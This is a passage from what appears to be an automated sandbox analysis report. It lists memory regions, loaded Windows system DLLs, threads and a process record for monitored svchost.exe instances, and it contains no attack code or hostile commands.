"vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15965 start_va = 0x8c76250000 end_va = 0x8c7625ffff entry_point = 0x8c76250000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15966 start_va = 0x8c76360000 end_va = 0x8c7636ffff entry_point = 0x8c76360000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15967 start_va = 0x8c76370000 end_va = 0x8c7637ffff entry_point = 0x8c76370000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15968 start_va = 0x8c76380000 end_va = 0x8c7638ffff entry_point = 0x8c76380000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15969 start_va = 0x8c76390000 end_va = 0x8c7639ffff entry_point = 0x8c76390000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15970 start_va = 0x8c763a0000 end_va = 0x8c763affff entry_point = 0x8c763a0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15971 start_va = 0x8c763b0000 end_va = 0x8c763bffff entry_point = 0x8c763b0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15972 start_va = 0x8c763c0000 end_va = 0x8c763cffff entry_point = 0x8c763c0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15973 start_va = 0x8c763d0000 end_va = 0x8c763dffff entry_point = 0x8c763d0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15974 start_va = 0x8c763e0000 end_va = 0x8c763effff entry_point = 0x8c763e0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15975 start_va = 0x8c763f0000 end_va = 0x8c763fffff entry_point = 0x8c763f0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15976 start_va = 0x8c76400000 end_va = 0x8c76400fff entry_point = 0x0 region_type = private name = "private_0x0000008c76400000" filename = "" Region: id = 15977 start_va = 0x8c76420000 end_va = 0x8c7642ffff entry_point = 0x8c76420000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15978 start_va = 0x8c76430000 end_va = 0x8c76430fff entry_point = 0x0 region_type = private name = "private_0x0000008c76430000" filename = "" Region: id = 15979 start_va = 0x8c76440000 end_va = 0x8c76440fff entry_point = 0x0 region_type = private name = "private_0x0000008c76440000" filename = "" Region: id = 15980 start_va = 0x8c76450000 end_va = 0x8c76450fff entry_point = 0x0 region_type = private name = "private_0x0000008c76450000" filename = "" Region: id = 15981 start_va = 0x8c76460000 end_va = 0x8c76460fff entry_point = 0x0 region_type = private name = "private_0x0000008c76460000" filename = "" Region: id = 15982 start_va = 0x8c76470000 end_va = 0x8c7647ffff entry_point = 0x8c76470000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15983 start_va = 0x8c76480000 end_va = 0x8c76480fff entry_point = 0x0 region_type = private name = "private_0x0000008c76480000" filename = "" Region: id = 15984 start_va = 0x8c76490000 end_va = 0x8c7649ffff entry_point = 0x8c76490000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15985 start_va = 0x8c764a0000 end_va = 0x8c764affff entry_point = 0x8c764a0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15986 start_va = 0x8c764b0000 end_va = 0x8c764bffff entry_point = 0x8c764b0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15987 start_va = 0x8c76500000 end_va = 0x8c765fffff entry_point = 0x0 region_type = private name = "private_0x0000008c76500000" filename = "" Region: id = 15988 start_va = 0x7df5ff790000 end_va = 0x7ff5ff78ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff790000" filename = "" Region: id = 15989 start_va = 0x7ff7b3158000 end_va = 0x7ff7b3159fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3158000" filename = "" Region: id = 15990 start_va = 0x7ff7b315a000 end_va = 0x7ff7b315bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b315a000" filename = "" Region: id = 15991 start_va = 0x7ff7b315c000 end_va = 0x7ff7b315dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b315c000" filename = "" Region: id = 15992 start_va = 0x7ff7b315e000 end_va = 0x7ff7b315ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b315e000" filename = "" Region: id = 15993 start_va = 0x7ff7b3160000 end_va = 0x7ff7b325ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3160000" filename = "" Region: id = 15994 start_va = 0x7ff7b3260000 end_va = 0x7ff7b3282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3260000" filename = "" Region: id = 15995 start_va = 0x7ff7b3286000 end_va = 0x7ff7b3286fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3286000" filename = "" Region: id = 15996 start_va = 0x7ff7b328a000 end_va = 0x7ff7b328bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b328a000" filename = "" Region: id = 15997 start_va = 0x7ff7b328e000 end_va = 0x7ff7b328ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b328e000" filename = "" Region: id = 15998 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 15999 start_va = 0x7ffbf1dc0000 end_va = 0x7ffbf1e58fff entry_point = 0x7ffbf1dc0000 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 16000 start_va = 0x7ffbf1e60000 end_va = 0x7ffbf20f1fff entry_point = 0x7ffbf1e60000 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 16001 start_va = 0x7ffbf5460000 end_va = 0x7ffbf58c9fff entry_point = 0x7ffbf5460000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 16002 start_va = 0x7ffbf6fc0000 end_va = 0x7ffbf7156fff entry_point = 0x7ffbf6fc0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 16003 start_va = 0x7ffbf7160000 end_va = 0x7ffbf7441fff entry_point = 0x7ffbf7160000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 16004 start_va = 0x7ffbf7450000 end_va = 0x7ffbf74d0fff entry_point = 0x7ffbf7450000 region_type = mapped_file name = "tileobjserver.dll" filename = "\\Windows\\System32\\tileobjserver.dll" (normalized: "c:\\windows\\system32\\tileobjserver.dll") Region: id = 16005 start_va = 0x7ffbf9380000 end_va = 0x7ffbf96f5fff entry_point = 0x7ffbf9380000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 16006 start_va = 0x7ffbf9700000 end_va = 0x7ffbf980efff entry_point = 0x7ffbf9700000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 16007 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 16008 start_va = 0x7ffbfe5e0000 end_va = 0x7ffbfe645fff entry_point = 0x7ffbfe5e0000 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 16009 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 16010 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 16011 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 16012 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 16013 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 16014 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 16015 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 16016 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 16017 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 16018 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 16019 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 16020 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 16021 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 16022 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16023 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 16024 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16025 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 16026 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16027 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16028 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16029 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16030 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16031 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 16032 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 16033 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16034 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1366 os_tid = 0xa40 Thread: id = 1367 os_tid = 0xa0c Thread: id = 1368 os_tid = 0x984 Thread: id = 1369 os_tid = 0x978 Thread: id = 1370 os_tid = 0x6e0 Thread: id = 1371 os_tid = 0x60c Process: id = "293" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9364000" os_pid = "0x758" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15477 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15478 start_va = 0x3b4ee30000 end_va = 0x3b4ee3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4ee30000" filename = "" Region: id = 15479 start_va = 0x3b4ee40000 end_va = 0x3b4ee40fff entry_point = 0x3b4ee40000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 15480 start_va = 0x3b4ee50000 end_va = 0x3b4ee63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4ee50000" filename = "" Region: id = 15481 start_va = 0x3b4ee70000 end_va = 0x3b4eeeffff entry_point = 0x0 region_type = private name = "private_0x0000003b4ee70000" filename = "" Region: id = 15482 start_va = 0x3b4eef0000 end_va = 0x3b4eef3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4eef0000" filename = "" Region: id = 15483 start_va = 0x3b4ef00000 end_va = 0x3b4ef00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4ef00000" filename = "" Region: id = 15484 start_va = 0x3b4ef10000 end_va = 0x3b4ef11fff entry_point = 0x0 region_type = private name = "private_0x0000003b4ef10000" filename = "" Region: id = 15485 start_va = 0x3b4ef20000 end_va = 0x3b4efddfff entry_point = 0x3b4ef20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15486 start_va = 0x3b4f060000 end_va = 0x3b4f060fff entry_point = 0x0 region_type = private name = "private_0x0000003b4f060000" filename = "" Region: id = 15487 start_va = 0x3b4f070000 end_va = 0x3b4f070fff entry_point = 0x0 region_type = private name = "private_0x0000003b4f070000" filename = "" Region: id = 15488 start_va = 0x3b4f080000 end_va = 0x3b4f080fff entry_point = 0x3b4f080000 region_type = mapped_file name = "phoneutilres.dll" filename = "\\Windows\\System32\\PhoneutilRes.dll" (normalized: "c:\\windows\\system32\\phoneutilres.dll") Region: id = 15489 start_va = 0x3b4f090000 end_va = 0x3b4f096fff entry_point = 0x0 region_type = private name = "private_0x0000003b4f090000" filename = "" Region: id = 15490 start_va = 0x3b4f0b0000 end_va = 0x3b4f0b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4f0b0000" filename = "" Region: id = 15491 start_va = 0x3b4f0c0000 end_va = 0x3b4f0c6fff entry_point = 0x0 region_type = private name = "private_0x0000003b4f0c0000" filename = "" Region: id = 15492 start_va = 0x3b4f0d0000 end_va = 0x3b4f0d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4f0d0000" filename = "" Region: id = 15493 start_va = 0x3b4f0e0000 end_va = 0x3b4f0e0fff entry_point = 0x3b4f0e0000 region_type = mapped_file name = "syncres.dll" filename = "\\Windows\\System32\\SyncRes.dll" (normalized: "c:\\windows\\system32\\syncres.dll") Region: id = 15494 start_va = 0x3b4f100000 end_va = 0x3b4f1fffff entry_point = 0x0 region_type = private name = "private_0x0000003b4f100000" filename = "" Region: id = 15495 start_va = 0x3b4f200000 end_va = 0x3b4f2fffff entry_point = 0x0 region_type = private name = "private_0x0000003b4f200000" filename = "" Region: id = 15496 start_va = 0x3b4f300000 end_va = 0x3b4f487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4f300000" filename = "" Region: id = 15497 start_va = 0x3b4f490000 end_va = 0x3b4f610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4f490000" filename = "" Region: id = 15498 start_va = 0x3b4f620000 end_va = 0x3b50a1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b4f620000" filename = "" Region: id = 15499 start_va = 0x3b50a20000 end_va = 0x3b50b1ffff entry_point = 0x0 region_type = private name = "private_0x0000003b50a20000" filename = "" Region: id = 15500 start_va = 0x3b50b20000 end_va = 0x3b50c1ffff entry_point = 0x0 region_type = private name = "private_0x0000003b50b20000" filename = "" Region: id = 15501 start_va = 0x3b50ca0000 end_va = 0x3b50d9ffff entry_point = 0x0 region_type = private name = "private_0x0000003b50ca0000" filename = "" Region: id = 15502 start_va = 0x3b50da0000 end_va = 0x3b50e9ffff entry_point = 0x0 region_type = private name = "private_0x0000003b50da0000" filename = "" Region: id = 15503 start_va = 0x3b50ea0000 end_va = 0x3b511d6fff entry_point = 0x3b50ea0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 15504 start_va = 0x3b511e0000 end_va = 0x3b512dffff entry_point = 0x0 region_type = private name = "private_0x0000003b511e0000" filename = "" Region: id = 15505 start_va = 0x3b512e0000 end_va = 0x3b51309fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b512e0000" filename = "" Region: id = 15506 start_va = 0x7df5ff890000 end_va = 0x7ff5ff88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff890000" filename = "" Region: id = 15507 start_va = 0x7ff7b3bbc000 end_va = 0x7ff7b3bbdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3bbc000" filename = "" Region: id = 15508 start_va = 0x7ff7b3bbe000 end_va = 0x7ff7b3bbffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3bbe000" filename = "" Region: id = 15509 start_va = 0x7ff7b3bc0000 end_va = 0x7ff7b3cbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3bc0000" filename = "" Region: id = 15510 start_va = 0x7ff7b3cc0000 end_va = 0x7ff7b3ce2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3cc0000" filename = "" Region: id = 15511 start_va = 0x7ff7b3ce4000 end_va = 0x7ff7b3ce5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ce4000" filename = "" Region: id = 15512 start_va = 0x7ff7b3ce8000 end_va = 0x7ff7b3ce9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ce8000" filename = "" Region: id = 15513 start_va = 0x7ff7b3cec000 end_va = 0x7ff7b3cecfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3cec000" filename = "" Region: id = 15514 start_va = 0x7ff7b3cee000 end_va = 0x7ff7b3ceffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3cee000" filename = "" Region: id = 15515 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 15516 start_va = 0x7ffbeaac0000 end_va = 0x7ffbeab2bfff entry_point = 0x7ffbeaac0000 region_type = mapped_file name = "synccontroller.dll" filename = "\\Windows\\System32\\SyncController.dll" (normalized: "c:\\windows\\system32\\synccontroller.dll") Region: id = 15517 start_va = 0x7ffbeab30000 end_va = 0x7ffbeab3cfff entry_point = 0x7ffbeab30000 region_type = mapped_file name = "inproclogger.dll" filename = "\\Windows\\System32\\InprocLogger.dll" (normalized: "c:\\windows\\system32\\inproclogger.dll") Region: id = 15518 start_va = 0x7ffbeab40000 end_va = 0x7ffbeab80fff entry_point = 0x7ffbeab40000 region_type = mapped_file name = "phoneutil.dll" filename = "\\Windows\\System32\\Phoneutil.dll" (normalized: "c:\\windows\\system32\\phoneutil.dll") Region: id = 15519 start_va = 0x7ffbeab90000 end_va = 0x7ffbead00fff entry_point = 0x7ffbeab90000 region_type = mapped_file name = "pimstore.dll" filename = "\\Windows\\System32\\Pimstore.dll" (normalized: "c:\\windows\\system32\\pimstore.dll") Region: id = 15520 start_va = 0x7ffbead10000 end_va = 0x7ffbead56fff entry_point = 0x7ffbead10000 region_type = mapped_file name = "syncutil.dll" filename = "\\Windows\\System32\\syncutil.dll" (normalized: "c:\\windows\\system32\\syncutil.dll") Region: id = 15521 start_va = 0x7ffbead60000 end_va = 0x7ffbead6afff entry_point = 0x7ffbead60000 region_type = mapped_file name = "mccspal.dll" filename = "\\Windows\\System32\\MCCSPal.dll" (normalized: "c:\\windows\\system32\\mccspal.dll") Region: id = 15522 start_va = 0x7ffbead70000 end_va = 0x7ffbead85fff entry_point = 0x7ffbead70000 region_type = mapped_file name = "userdataplatformhelperutil.dll" filename = "\\Windows\\System32\\UserDataPlatformHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdataplatformhelperutil.dll") Region: id = 15523 start_va = 0x7ffbead90000 end_va = 0x7ffbeada6fff entry_point = 0x7ffbead90000 region_type = mapped_file name = "networkhelper.dll" filename = "\\Windows\\System32\\networkhelper.dll" (normalized: "c:\\windows\\system32\\networkhelper.dll") Region: id = 15524 start_va = 0x7ffbeadb0000 end_va = 0x7ffbeadfdfff entry_point = 0x7ffbeadb0000 region_type = mapped_file name = "aphostservice.dll" filename = "\\Windows\\System32\\APHostService.dll" (normalized: "c:\\windows\\system32\\aphostservice.dll") Region: id = 15525 start_va = 0x7ffbeb120000 end_va = 0x7ffbeb130fff entry_point = 0x7ffbeb120000 region_type = mapped_file name = "userdatalanguageutil.dll" filename = "\\Windows\\System32\\UserDataLanguageUtil.dll" (normalized: "c:\\windows\\system32\\userdatalanguageutil.dll") Region: id = 15526 start_va = 0x7ffbeb140000 end_va = 0x7ffbeb160fff entry_point = 0x7ffbeb140000 region_type = mapped_file name = "userdatatimeutil.dll" filename = "\\Windows\\System32\\UserDataTimeUtil.dll" (normalized: "c:\\windows\\system32\\userdatatimeutil.dll") Region: id = 15527 start_va = 0x7ffbeb170000 end_va = 0x7ffbeb1a5fff entry_point = 0x7ffbeb170000 region_type = mapped_file name = "accountaccessor.dll" filename = "\\Windows\\System32\\accountaccessor.dll" (normalized: "c:\\windows\\system32\\accountaccessor.dll") Region: id = 15528 start_va = 0x7ffbeb1b0000 end_va = 0x7ffbeb1bffff entry_point = 0x7ffbeb1b0000 region_type = mapped_file name = "aphostclient.dll" filename = "\\Windows\\System32\\APHostClient.dll" (normalized: "c:\\windows\\system32\\aphostclient.dll") Region: id = 15529 start_va = 0x7ffbeb1c0000 end_va = 